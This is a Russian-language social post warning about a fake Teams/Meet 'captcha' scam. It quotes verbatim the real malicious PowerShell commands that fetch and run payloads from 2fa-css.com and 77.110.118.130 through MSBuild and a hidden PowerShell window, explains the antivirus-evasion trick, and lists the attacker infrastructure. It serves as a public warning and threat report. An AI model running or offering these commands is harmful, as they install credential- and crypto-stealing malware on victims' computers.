Сегодня чуть не соскамился (сходил на созвон) 🤡 Написали 2 человека с предложением сделать бота для управления заказами, один из них скинул контакт якобы босса для обсуждения деталей, договорились созвониться Я предложил свой голосовой сервис https://voice.sanyakhma.ru - на что получил ответ что у него не получилось подключиться, что странно(это вообще последнее что там может сломаться) Но человек дал ссылки на Teams/Meet: - https://microsoft-teams-conference.com/join/7143422263295 - https://google-meet-conference.com/iaw-kpmx-bck При открытии там вроде-бы похожий UI на реальный сервис и Cloudflare проверка с чекбоксом "I'm not a robot", но при открытии: To better prove you are not a robot, please: Press & hold the Windows Key + R. In the verification window, press Ctrl + V. Press Enter on your keyboard to finish. You will observe and agree: Cloudflare verification (Ray ID: 90b0e54eb8bd5d84) При клике в буфер копируется команда: powershell -c "iwr https://2fa-css.com/s.proj -o C:\ProgramData\s.proj; & $env:windir\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\ProgramData\s.proj" Дальше просят нажать Win+R и Ctrl+V вставить "для верификации" Техника MSBuild LOLBin: - Качают .proj файл (XML для сборки проектов) - В .proj может быть inline C# код - Запускают через MSBuild.exe (легитимный инструмент Microsoft) - Антивирусы пропускают, т.к. MSBuild подписан Microsoft - Не требует прав админа Резервный payload: PoWeRsHeLl -NoP -W Hidden -C "$u='http://77.110.118.130/EANFPJww.txt'.Replace('xx','tt');[ScriptBlock]::Create((Invoke-RestMethod $u)).Invoke()" Скрытое окно PowerShell качает скрипт и выполняет, Replace('xx','tt') - обход статических сигнатур антивирусов Чем рискует пользователь: Пароли из браузеров, криптокошельки, Clipper с заменой адресов перевода криптовалюты на адреса мошенников, ssh ключи, steam и все что может быть ценным Инфраструктура: Активные домены: - 2fa-css.com (payload сервер) - google-meet-conference.com - microsoft-teams-conference.com Заблокированные Cloudflare: - teams-mst.com (104.21.78.132) - mst-teams.com (104.21.53.120) - 2fa-vrf.com (104.21.18.23) - 2fa-acc.com (104.21.89.154) C2 сервер: - 77.110.118.130 (Aeza Network, AS210644) - Хост: importedpet.ptr.network - SSL сертификат: tunnel.vk-apps.com - Порты 22, 443, 8080 открыты Написал в Aeza с детальным разбором и приложил HTML страницы. UPD: Aeza ответили через 2 часа - "передали данные в отдел безопасности". Посмотрим заблокируют ли сервер 👀 Как не попасться: Всегда проверяйте URL сайтов, Включайте голову и будьте бдительны, Ну и официальные, реальные сервисы не просят для прохождении капчи вводить команды на вашем пк Можете пересылать друзьям/знакомым, которые ходят на созвоны и могут попасться на такие схемы❤️